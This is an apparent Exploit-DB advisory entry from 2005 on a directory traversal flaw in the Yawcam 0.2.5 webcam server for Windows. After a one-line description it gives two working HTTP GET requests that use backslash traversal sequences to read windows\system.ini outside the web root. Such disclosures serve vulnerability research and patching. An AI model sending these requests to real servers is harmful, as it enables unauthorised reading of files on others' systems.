yawcam 0.2.5 - Directory Traversal

EDB-ID:

25487

CVE:

N/A


Platform:

Windows

Published:

2005-04-21

source: http://www.securityfocus.com/bid/13295/info

Yawcam is prone to a directory traversal vulnerability that could allow attackers to read files outside the Web root. 

GET ..\..\..\..\..\..\..\..\windows\system.ini HTTP/1.0

GET \..\..\..\..\..\..\..\..\windows\system.ini HTTP/1.0